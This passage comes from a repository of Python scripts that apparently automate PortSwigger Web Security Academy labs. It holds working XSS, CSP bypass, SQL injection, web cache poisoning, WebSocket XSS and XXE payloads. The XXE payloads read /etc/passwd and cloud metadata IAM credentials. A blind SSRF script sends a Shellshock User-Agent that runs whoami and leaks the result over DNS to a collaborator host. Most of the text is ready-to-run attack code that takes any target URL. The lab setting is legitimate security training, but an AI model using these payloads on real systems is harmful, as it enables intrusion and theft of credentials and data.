19 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
20 | 
21 | 
22 | ##########################################################
23 | #	FUNCTIONS
24 | ##########################################################
25 | 
26 | def send_payload(s, url, payload):
27 | 	injection_uri = url + payload
28 | 	r = s.get(injection_uri, verify=False, proxies=proxies)
29 | 	time.sleep(1)
30 | 	print('[+] Targeted endpoint or query parameter:\n    %s' % url)
31 | 	print('[+] Using payload:\t%s' % payload)
32 | 	return r
33 | 
34 | def send_xss(s, url):
35 | 	search_path = url + '/?search='
36 | 	xss_payload = """%3Cscript%3Ealert%281%29%3C%2Fscript%3E&token=;script-src-elem%20%27unsafe-inline%27"""
37 | 	r = send_payload(s, search_path, xss_payload)
38 | 	return r
39 | 
40 | 
41 | ##########################################################
42 | #	MAIN
43 | ##########################################################
44 | 
45 | def main():
46 | 	print('[+] Lab: Reflected XSS protected by CSP, with CSP bypass')
47 | 	parser = argparse.ArgumentParser(description="[+] Lab: Reflected XSS protected by CSP, with CSP bypass")
48 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
49 | 	args = parser.parse_args()
50 | 	parsed_url = urllib.parse.urlparse(args.url)
51 | 	host = parsed_url.netloc
52 | 	print(parsed_url)
53 | 	url = parsed_url.scheme + '://' + host
54 | 	s = requests.Session()
55 | 	s.proxies = proxies		# Comment this line to disable proxying
56 | 	s.verify = False
57 | 	try:
58 | 		r = s.get(url, allow_redirects=False)
59 | 		time.sleep(1)
60 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
61 | 			print('\n[-] HOST seems to be down <!>')
62 | 			sys.exit(-1)
63 | 		else:
64 | 			print('[+] Trying send a cross-site scripting attack that calls the alert function...')
65 | 			r = send_xss(s, url)
66 | 			s.cookies.clear()
67 | 			s.headers.clear()
68 | 			time.sleep(5)
69 | 			r = s.get(url)
70 | 			if r.status_code == 200 :
71 | 				if  'Congratulations, you solved the lab!' in r.text:
72 | 					print('[+] The lab is solved')
73 | 				else:
74 | 					print('[+] The Exploit sent the given payload !')
75 | 	except requests.exceptions.ProxyError:
76 | 		print('[-] PROXY seems to be missconfigured <!>')
77 | 	except KeyboardInterrupt:
78 | 		sys.exit(0)
79 | 
80 | if __name__ == "__main__":
81 | 	main()
82 | 


--------------------------------------------------------------------------------
/InformationDisclosure/exploit-lab02.py:
--------------------------------------------------------------------------------
 1 | # Information disclosure on debug page
 2 | 
 3 | # https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-on-debug-page
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def get_secret_key(s, url):
26 | 	debug_path = '/cgi-bin/phpinfo.php'
27 | 	print('\n[+] Navigating to phpinfo.php debug page: \t%s' % debug_path)
28 | 	r = s.get(url + debug_path)
29 | 	secret_key = re.search(r'SECRET_KEY </td><td class="v">(.*) </td>', r.text).group(1)
30 | 	print('[+] Found Application Secret key:\t\t%s' % secret_key)
31 | 	return secret_key
32 | 
33 | def submit_secret_key(s, url, secret_key):
34 | 	print('[+] Trying to submit the secret_key to solve the lab...')
35 | 	submit_path = url + '/submitSolution'
36 | 	submit_data = {"answer": secret_key}
37 | 	r = s.post(submit_path, data=submit_data)
38 | 	time.sleep(1)
39 | 	return r
40 | 
41 | 
42 | ##########################################################
43 | #	MAIN
44 | ##########################################################
45 | 
46 | def main():
47 | 	print('[+] Lab: Information disclosure on debug page')
48 | 	parser = argparse.ArgumentParser(description="[+] Lab: Information disclosure on debug page")
49 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
50 | 	args = parser.parse_args()
51 | 	parsed_url = urllib.parse.urlparse(args.url)
52 | 	host = parsed_url.netloc
53 | 	print(parsed_url)
54 | 	url = parsed_url.scheme + '://' + host
55 | 	s = requests.Session()
56 | 	s.proxies = proxies		# Comment this line to disable proxying
57 | 	s.verify = False
58 | 	try:
59 | 		r = s.get(url, allow_redirects=False)
60 | 		time.sleep(1)
61 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
62 | 			print('\n[-] HOST seems to be down <!>')
63 | 			sys.exit(-1)
64 | 		else:
65 | 			print('[+] Trying to retrieve the secret_key of the framework...\n')
66 | 			time.sleep(1)
67 | 			secret_key = get_secret_key(s, url)
68 | 			r = submit_secret_key(s, url, secret_key)
69 | 			s.cookies.clear()
70 | 			time.sleep(2)
71 | 			r = s.get(url)
72 | 			if 'Congratulations, you solved the lab!' in r.text:
73 | 				print('\n[+] The lab is solved !')
74 | 	except requests.exceptions.ProxyError:
75 | 		print('[-] PROXY seems to be missconfigured <!>')
76 | 	except KeyboardInterrupt:
77 | 		sys.exit(0)
78 | 
79 | if __name__ == "__main__":
80 | 	main()
81 | 


--------------------------------------------------------------------------------
/SQLInjection/exploit-lab07.py:
--------------------------------------------------------------------------------
 1 | # SQL injection UNION attack, determining the number of columns returned by the query
 2 | 
 3 | # https://portswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-columns
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import argparse
12 | 
13 | 
14 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
15 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
16 | 
17 | 
18 | ##########################################################
19 | #	FUNCTIONS
20 | ##########################################################
21 | 
22 | def send_payload(s, url, payload):
23 | 	injection_uri = url + payload
24 | 	r = s.get(injection_uri)
25 | 	time.sleep(1)
26 | 	print('[+] Using payload:\t%s' % injection_uri)
27 | 	return r
28 | 
29 | def exploit_sqli(s, url):
30 | 	filter_path = url + '/filter?category='
31 | 	payload = "' UNION SELECT NULL--"
32 | 	for i in range(1, 8):
33 | 		if send_payload(s, filter_path, payload).status_code == 200:
34 | 			print('[+] Number of Columns returned:\t%s' % i)
35 | 			return True
36 | 		else:
37 | 			payload = payload[:-2]
38 | 			payload += ", NULL--"
39 | 
40 | 
41 | 
42 | ##########################################################
43 | #	MAIN
44 | ##########################################################
45 | 
46 | def main():
47 | 	print('[+] Lab: SQL injection UNION attack, determining the number of columns returned by the query')
48 | 	parser = argparse.ArgumentParser(description="[+] Lab: SQL injection UNION attack, determining the number of columns returned by the query")
49 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
50 | 	args = parser.parse_args()
51 | 	parsed_url = urllib.parse.urlparse(args.url)
52 | 	host = parsed_url.netloc
53 | 	print(parsed_url)
54 | 	url = parsed_url.scheme + '://' + host
55 | 	s = requests.Session()
56 | 	s.proxies = proxies		# Comment this line to disable proxying
57 | 	s.verify = False
58 | 	try:
59 | 		r = s.get(url, allow_redirects=False)
60 | 		time.sleep(1)
61 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
62 | 			print('\n[-] HOST seems to be down <!>')
63 | 			sys.exit(-1)
64 | 		else:
65 | 			print('[+] Determining the number of columns returned by the query.\n')
66 | 			if exploit_sqli(s, url):
67 | 				print('\n[+] SQL Injection sent !')
68 | 				time.sleep(5)
69 | 				s.cookies.clear()
70 | 				s.headers.clear()
71 | 				r = s.get(url)
72 | 				if 'Congratulations, you solved the lab!' in r.text:
73 | 					print('[+] The lab is solved !')
74 | 			else:
75 | 				print('\n[-] SQL Injection Failed <!>')
76 | 	except requests.exceptions.ProxyError:
77 | 		print('[-] PROXY seems to be missconfigured <!>')
78 | 	except KeyboardInterrupt:
79 | 		sys.exit(0)
80 | 
81 | if __name__ == "__main__":
82 | 	main()
83 | 


--------------------------------------------------------------------------------
/XSS/exploit-lab05.py:
--------------------------------------------------------------------------------
 1 | # DOM XSS in jQuery anchor href attribute sink using location.search source
 2 | 
 3 | # https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-jquery-href-attribute-sink
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def send_payload(s, url, payload):
26 | 	injection_uri = url + payload
27 | 	r = s.get(injection_uri, verify=False, proxies=proxies)
28 | 	time.sleep(1)
29 | 	print('[+] Targeted endpoint or query parameter:\n    %s' % url)
30 | 	print('[+] Using payload:\t%s' % payload)
31 | 	return r
32 | 
33 | def send_xss(s, url):
34 | 	search_path = url + '/feedback?returnPath='
35 | 	xss_payload = 'javascript:alert(document.cookie)'
36 | 	r = send_payload(s, search_path, xss_payload)
37 | 	return r
38 | 
39 | 
40 | ##########################################################
41 | #	MAIN
42 | ##########################################################
43 | 
44 | def main():
45 | 	print('[+] Lab: DOM XSS in jQuery anchor href attribute sink using location.search source')
46 | 	parser = argparse.ArgumentParser(description="[+] Lab: DOM XSS in jQuery anchor href attribute sink using location.search source")
47 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
48 | 	args = parser.parse_args()
49 | 	parsed_url = urllib.parse.urlparse(args.url)
50 | 	host = parsed_url.netloc
51 | 	print(parsed_url)
52 | 	url = parsed_url.scheme + '://' + host
53 | 	s = requests.Session()
54 | 	s.proxies = proxies		# Comment this line to disable proxying
55 | 	s.verify = False
56 | 	try:
57 | 		r = s.get(url, allow_redirects=False)
58 | 		time.sleep(1)
59 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
60 | 			print('\n[-] HOST seems to be down <!>')
61 | 			sys.exit(-1)
62 | 		else:
63 | 			print('[+] Trying send a cross-site scripting attack that calls the alert function...')
64 | 			r = send_xss(s, url)
65 | 			s.cookies.clear()
66 | 			s.headers.clear()
67 | 			time.sleep(3)
68 | 			r = s.get(url)
69 | 			if r.status_code == 200 and 'Congratulations, you solved the lab!' in r.text:
70 | 				print('[+] The lab is solved')
71 | 			elif r.status_code == 200:
72 | 				print('[+] The Exploit sent the given payload !')
73 | 	except requests.exceptions.ProxyError:
74 | 		print('[-] PROXY seems to be missconfigured <!>')
75 | 	except KeyboardInterrupt:
76 | 		sys.exit(0)
77 | 
78 | if __name__ == "__main__":
79 | 	main()
80 | 


--------------------------------------------------------------------------------
/WebCachePoisoning/exploit-lab02.py:
--------------------------------------------------------------------------------
 1 | # Web cache poisoning with an unkeyed cookie
 2 | 
 3 | # https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws/lab-web-cache-poisoning-with-an-unkeyed-cookie
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | ##########################################################
21 | #	FUNCTIONS
22 | ##########################################################
23 | 
24 | def send_sequence(s, url):
25 | 	exploit_body = 'gwyo"-alert(1)-"gwyo'
26 | 	cookies = {'fehost': exploit_body}
27 | 	cache_buster = url + '/?cb=1234'
28 | 	solved = False
29 | 	while solved == False:
30 | 		print('\n[+] Sending cache poisoning request...')
31 | 		r = s.get(cache_buster, cookies=cookies)
32 | 		time.sleep(2)
33 | 		if r.headers['X-cache'] == 'hit':
34 | 			r = s.get(url, cookies=cookies)
35 | 			if r.headers['X-Cache'] == "hit":
36 | 				print('[+] Cache poisoned')
37 | 				print('[+] Waiting %s seconds before retry...' % str(30 - int(r.headers['Age'])))
38 | 				time.sleep(30 - int(r.headers['Age']))
39 | 				r = s.get(url)
40 | 				if 'Congratulations, you solved the lab!' in r.text:
41 | 					print('\n[+] The lab is solved !')
42 | 					solved = True
43 | 					break
44 | 			else:
45 | 				print('[+] Received "X-cache: miss"...')
46 | 				time.sleep(2)
47 | 
48 | 
49 | ##########################################################
50 | #	MAIN
51 | ##########################################################
52 | 
53 | def main():
54 | 	print('[+] Lab: Web cache poisoning with an unkeyed cookie')
55 | 	parser = argparse.ArgumentParser(description="[+] Lab: Web cache poisoning with an unkeyed cookie")
56 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
57 | 	args = parser.parse_args()
58 | 	parsed_url = urllib.parse.urlparse(args.url)
59 | 	host = parsed_url.netloc
60 | 	print(parsed_url)
61 | 	url = parsed_url.scheme + '://' + host
62 | 	s = requests.Session()
63 | 	s.proxies = proxies		# Comment this line to disable proxying
64 | 	s.verify = False
65 | 	try:
66 | 		r = s.get(url, allow_redirects=False)
67 | 		time.sleep(1)
68 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
69 | 			print('\n[-] HOST seems to be down <!>')
70 | 			sys.exit(-1)
71 | 		else:
72 | 			print('[+] Trying to send Web Cache Poisoning attack...\n')
73 | 			time.sleep(1)
74 | 			send_sequence(s, url)
75 | 	except requests.exceptions.ProxyError:
76 | 		print('[-] PROXY seems to be missconfigured <!>')
77 | 	except KeyboardInterrupt:
78 | 		sys.exit(0)
79 | 
80 | if __name__ == "__main__":
81 | 	main()
82 | 


--------------------------------------------------------------------------------
/SSRF/exploit-lab06.py:
--------------------------------------------------------------------------------
 1 | # Blind SSRF with Shellshock exploitation
 2 | 
 3 | # https://portswigger.net/web-security/ssrf/blind/lab-shellshock-exploitation
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | product_path = '/product?productId=1'
21 | 
22 | 
23 | ##########################################################
24 | #	FUNCTIONS
25 | ##########################################################
26 | 
27 | def send_ssrf(s, url, collab):
28 | 	product_url = url + product_path
29 | 	user_agent = "() { :; }; /bin/nslookup -v -debug $(whoami)." + collab
30 | 	print('[+] User-Agent:\t%s' % user_agent)
31 | 	for i in range(1, 256):
32 | 		sys.stdout.flush()
33 | 		headers = {"Referer": "http://192.168.0." + str(i) + ':8080', "User-Agent": user_agent}
34 | 		r = s.get(product_url, headers=headers)
35 | 		sys.stdout.write("\r[+] Referer:\thttp://192.168.0.%s:8080" % str(i))
36 | 	sys.stdout.flush()
37 | 	print("\n[+] You should Poll Now your collaborator and see a DNS request...")
38 | 	print("[+] Check the subdomain of the sender and get the result of whoami command...")
39 | 	print("[+] Grab it and submit it !")
40 | 	
41 | 
42 | ##########################################################
43 | #	MAIN
44 | ##########################################################
45 | 
46 | def main():
47 | 	print('[+] Lab: Blind SSRF with Shellshock exploitation')
48 | 	parser = argparse.ArgumentParser(description="[+] Lab: Blind SSRF with Shellshock exploitation")
49 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
50 | 	parser.add_argument('-C',dest='collab',required=True, help="Collaborator URL")
51 | 	args = parser.parse_args()
52 | 	parsed_url = urllib.parse.urlparse(args.url)
53 | 	host = parsed_url.netloc
54 | 	print(parsed_url)
55 | 	url = parsed_url.scheme + '://' + host
56 | 	s = requests.Session()
57 | 	s.proxies = proxies		# Comment this line to disable proxying
58 | 	s.verify = False
59 | 	try:
60 | 		r = s.get(url, allow_redirects=False)
61 | 		time.sleep(1)
62 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
63 | 			print('\n[-] HOST seems to be down <!>')
64 | 			sys.exit(-1)
65 | 		else:
66 | 			# collab = "xxxxxxxxxxxxxxxxxxxx.oastify.com"
67 | 			collab = args.collab
68 | 			print("\n[+] Sending Blind SSRF via the 'Referer' header and ShellShock attack via 'User-Agent'...")
69 | 			send_ssrf(s, url, collab)
70 | 
71 | 	except requests.exceptions.ProxyError:
72 | 		print('[-] PROXY seems to be missconfigured <!>')
73 | 	except KeyboardInterrupt:
74 | 		sys.exit(0)
75 | 
76 | if __name__ == "__main__":
77 | 	main()
78 | 


--------------------------------------------------------------------------------
/SQLInjection/exploit-lab01.py:
--------------------------------------------------------------------------------
 1 | # SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
 2 | 
 3 | # https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import argparse
12 | 
13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
14 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
15 | 
16 | 
17 | ##########################################################
18 | #	FUNCTIONS
19 | ##########################################################
20 | 
21 | def exploit_sqli(s, url, payload):
22 | 	print('\n[+] Using payload: %s' % payload)
23 | 	r1 = s.get(url)
24 | 	time.sleep(1)
25 | 	released_count = len(re.findall('productcatalog', r1.text))
26 | 	print('[+] Items released in the catalog: %s' % released_count)
27 | 	filter_path = url + '/filter?category='
28 | 	injection_uri = filter_path + payload
29 | 	r2 = s.get(injection_uri)
30 | 	time.sleep(1)
31 | 	total_count = len(re.findall('productcatalog', r2.text))
32 | 	print('[+] Items found in the catalog with injection: %s' % total_count)
33 | 	return total_count > released_count
34 | 
35 | 
36 | ##########################################################
37 | #	MAIN
38 | ##########################################################
39 | 
40 | def main():
41 | 	print('[+] Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data')
42 | 	parser = argparse.ArgumentParser(description="[+] Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data")
43 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
44 | 	args = parser.parse_args()
45 | 	parsed_url = urllib.parse.urlparse(args.url)
46 | 	host = parsed_url.netloc
47 | 	print(parsed_url)
48 | 	url = parsed_url.scheme + '://' + host
49 | 	s = requests.Session()
50 | 	s.proxies = proxies		# Comment this line to disable proxying
51 | 	s.verify = False
52 | 	try:
53 | 		r = s.get(url, allow_redirects=False)
54 | 		time.sleep(1)
55 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
56 | 			print('\n[-] HOST seems to be down <!>')
57 | 			sys.exit(-1)
58 | 		else:
59 | 			print('[+] Retrieving all products in the list (including non-released).\n')
60 | 			payload = "' OR 1=1--"
61 | 			if exploit_sqli(s, url, payload):
62 | 				print('\n[+] SQL Injection successful !')
63 | 				time.sleep(5)
64 | 				s.cookies.clear()
65 | 				s.headers.clear()
66 | 				r = s.get(url)
67 | 				if 'Congratulations, you solved the lab!' in r.text:
68 | 					print('[+] The lab is solved !')
69 | 			else:
70 | 				print('\n[-] SQL Injection Failed <!>')
71 | 	except requests.exceptions.ProxyError:
72 | 		print('[-] PROXY seems to be missconfigured <!>')
73 | 	except KeyboardInterrupt:
74 | 		sys.exit(0)
75 | 
76 | if __name__ == "__main__":
77 | 	main()
78 | 


--------------------------------------------------------------------------------
/SQLInjection/exploit-lab14.py:
--------------------------------------------------------------------------------
 1 | # Blind SQL injection with time delays
 2 | 
 3 | # https://portswigger.net/web-security/sql-injection/blind/lab-time-delays
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def send_payload(s, url, tracking_cookie, payload):
26 | 	cookies = {"TrackingId": tracking_cookie + payload}
27 | 	r = s.get(url, cookies=cookies)
28 | 	time.sleep(.3)
29 | 	print('[+] Using payload:\t%s' % payload)
30 | 	return r
31 | 
32 | def cause_delay(s, url, tracking_cookie):
33 | 	delay_payload = "' || (SELECT pg_sleep(10))--"
34 | 	delay = send_payload(s, url, tracking_cookie, delay_payload)
35 | 	print('[+] Server takes %s seconds to respond !' % int(delay.elapsed.total_seconds()))
36 | 	if int(delay.elapsed.total_seconds()) >= 10:
37 | 		return delay
38 | 	else:
39 | 		return False
40 | 
41 | 
42 | ##########################################################
43 | #	MAIN
44 | ##########################################################
45 | 
46 | def main():
47 | 	print('[+] Lab: Blind SQL injection with time delays')
48 | 	parser = argparse.ArgumentParser(description="[+] Lab: Blind SQL injection with time delays")
49 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
50 | 	args = parser.parse_args()
51 | 	parsed_url = urllib.parse.urlparse(args.url)
52 | 	host = parsed_url.netloc
53 | 	print(parsed_url)
54 | 	url = parsed_url.scheme + '://' + host
55 | 	s = requests.Session()
56 | 	s.proxies = proxies		# Comment this line to disable proxying
57 | 	s.verify = False
58 | 	try:
59 | 		r = s.get(url, allow_redirects=False)
60 | 		time.sleep(1)
61 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
62 | 			print('\n[-] HOST seems to be down <!>')
63 | 			sys.exit(-1)
64 | 		else:
65 | 			tracking_cookie = s.cookies.get_dict().get('TrackingId')
66 | 			print("\n[+] Trying to cause a 10 second delay...")
67 | 			delay = cause_delay(s, url, tracking_cookie)
68 | 			if delay:
69 | 				print(delay)
70 | 				time.sleep(5)
71 | 				s.cookies.clear()
72 | 				s.headers.clear()
73 | 				r = s.get(url)
74 | 				if 'Congratulations, you solved the lab!' in r.text:
75 | 					print('[+] The lab is solved !')
76 | 			else:
77 | 				print("[-] Server didn't Respond with DELAY <!>")
78 | 	except requests.exceptions.ProxyError:
79 | 		print('[-] PROXY seems to be missconfigured <!>')
80 | 	except KeyboardInterrupt:
81 | 		sys.exit(0)
82 | 
83 | if __name__ == "__main__":
84 | 	main()
85 | 


--------------------------------------------------------------------------------
/Websockets/exploit-lab01.py:
--------------------------------------------------------------------------------
 1 | # Manipulating WebSocket messages to exploit vulnerabilities
 2 | 
 3 | # https://portswigger.net/web-security/websockets/lab-manipulating-messages-to-exploit-vulnerabilities
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import websocket
13 | import ssl
14 | import argparse
15 | 
16 | 
17 | warnings.filterwarnings("ignore", category=DeprecationWarning)
18 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
19 | 
20 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
21 | 
22 | 
23 | ##########################################################
24 | #	FUNCTIONS
25 | ##########################################################
26 | 
27 | def send_xss(host):
28 | 	ws = websocket.WebSocket(sslopt={"cert_reqs": ssl.CERT_NONE, "check_hostname": False})
29 | 	websock = 'wss://' + host
30 | 	chat_path = websock + '/chat'
31 | 	ws.connect(chat_path, http_proxy_host="127.0.0.1", http_proxy_port="8080", proxy_type="http")
32 | 	print('\n[+] Connecting to the chat sending "READY"...')
33 | 	ws.send("READY")
34 | 	resp = ws.recv()
35 | 	print('Response:\n\t%s' % resp)
36 | 	xss_payload = "<img src=x onerror='alert(1)'>"
37 | 	xss_msg = f'{{"message": "{xss_payload}"}}'
38 | 	print('\n[+] Sending:\n\t%s' % xss_msg)
39 | 	ws.send(str(xss_msg))
40 | 	resp = ws.recv()
41 | 	print('Response:\n\t%s' % resp)
42 | 	return resp
43 | 
44 | 
45 | ##########################################################
46 | #	MAIN
47 | ##########################################################
48 | 
49 | def main():
50 | 	print('[+] Lab: Manipulating WebSocket messages to exploit vulnerabilities')
51 | 	parser = argparse.ArgumentParser(description="[+] Lab: Manipulating WebSocket messages to exploit vulnerabilities")
52 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
53 | 	args = parser.parse_args()
54 | 	parsed_url = urllib.parse.urlparse(args.url)
55 | 	host = parsed_url.netloc
56 | 	print(parsed_url)
57 | 	url = parsed_url.scheme + '://' + host
58 | 	s = requests.Session()
59 | 	s.proxies = proxies		# Comment this line to disable proxying
60 | 	s.verify = False
61 | 	try:
62 | 		r = s.get(url, allow_redirects=False)
63 | 		time.sleep(1)
64 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
65 | 			print('\n[-] HOST seems to be down <!>')
66 | 			sys.exit(-1)
67 | 		else:
68 | 			print('[+] Trying to send XSS through Live Chat websockets...\n')
69 | 			time.sleep(1)
70 | 			send_xss(host)
71 | 			s.cookies.clear()
72 | 			time.sleep(2)
73 | 			r = s.get(url)
74 | 			if 'Congratulations, you solved the lab!' in r.text:
75 | 				print('\n[+] The lab is solved !')
76 | 	except requests.exceptions.ProxyError:
77 | 		print('[-] PROXY seems to be missconfigured <!>')
78 | 	except KeyboardInterrupt:
79 | 		sys.exit(0)
80 | 
81 | if __name__ == "__main__":
82 | 	main()
83 | 


--------------------------------------------------------------------------------
/XXE/exploit-lab01.py:
--------------------------------------------------------------------------------
 1 | # Exploiting XXE using external entities to retrieve files
 2 | 
 3 | # https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def send_xxe(s, url):
26 | 	check_stock_path = url + '/product/stock'
27 | 	exploit_body = """<?xml version="1.0" encoding="UTF-8"?>
28 | <!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
29 | <stockCheck><productId>&xxe;</productId><storeId>2</storeId></stockCheck>"""
30 | 	headers = {"Content-Type": "application/xml"}
31 | 	print('[+] Using payload:\t%s' % exploit_body)
32 | 	print('[+] Using headers:\t%s' % headers)
33 | 	r = s.post(check_stock_path, data=exploit_body, headers=headers)
34 | 	time.sleep(2)
35 | 	res = r.text
36 | 	print(res)
37 | 	return r
38 | 
39 | 
40 | ##########################################################
41 | #	MAIN
42 | ##########################################################
43 | 
44 | def main():
45 | 	print('[+] Lab: Exploiting XXE using external entities to retrieve files')
46 | 	parser = argparse.ArgumentParser(description="[+] Lab: Exploiting XXE using external entities to retrieve files")
47 | 	parser.add_argument('-U',dest='url',required=True, help="Target URL")
48 | 	args = parser.parse_args()
49 | 	parsed_url = urllib.parse.urlparse(args.url)
50 | 	host = parsed_url.netloc
51 | 	print(parsed_url)
52 | 	url = parsed_url.scheme + '://' + host
53 | 	s = requests.Session()
54 | 	s.proxies = proxies		# Comment this line to disable proxying
55 | 	s.verify = False
56 | 	try:
57 | 		r = s.get(url, allow_redirects=False)
58 | 		time.sleep(1)
59 | 		if '<h1>Error</h1>' in r.text or 'Server Error: Gateway Timeout' in r.text:
60 | 			print('\n[-] HOST seems to be down <!>')
61 | 			sys.exit(-1)
62 | 		else:
63 | 			print('[+] Trying send a XXE attack to retrieve /etc/passwd...')
64 | 			r = send_xxe(s, url)
65 | 			s.cookies.clear()
66 | 			s.headers.clear()
67 | 			time.sleep(5)
68 | 			r = s.get(url, allow_redirects=False)
69 | 			time.sleep(1)
70 | 			if r.status_code == 200 and 'Congratulations, you solved the lab!' in r.text:
71 | 				print('[+] The lab is solved !')
72 | 			elif r.status_code == 200:
73 | 				print('[+] The Exploit sent the given payload !')
74 | 	except requests.exceptions.ProxyError:
75 | 		print('[-] PROXY seems to be missconfigured <!>')
76 | 	except KeyboardInterrupt:
77 | 		sys.exit(0)
78 | 
79 | if __name__ == "__main__":
80 | 	main()
81 | 


--------------------------------------------------------------------------------
/XXE/exploit-lab02.py:
--------------------------------------------------------------------------------
 1 | # Exploiting XXE to perform SSRF attacks
 2 | 
 3 | # https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf
 4 | 
 5 | import sys
 6 | import requests
 7 | import urllib3
 8 | import urllib.parse
 9 | import re
10 | import time
11 | import warnings
12 | import argparse
13 | 
14 | 
15 | warnings.filterwarnings("ignore", category=DeprecationWarning)
16 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
17 | 
18 | proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
19 | 
20 | 
21 | ##########################################################
22 | #	FUNCTIONS
23 | ##########################################################
24 | 
25 | def send_xxe(s, url):
26 | 	check_stock_path = url + '/product/stock'
27 | 	exploit_body = """<?xml version="1.0" encoding="UTF-8"?>
28 | <!DOCTYPE stockCheck [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin">]>
29 | <stockCheck><productId>&xxe;</productId><storeId>2</storeId></stockCheck>"""
30 | 	headers = {"Content-Type": "application/xml"}
31 | 	print('[+] Using payload:\t%s' % exploit_body)
32 | 	print('[+] Using headers:\t%s' % headers)
33 | 	r = s.post(check_stock_path, data=exploit_body, headers=headers)
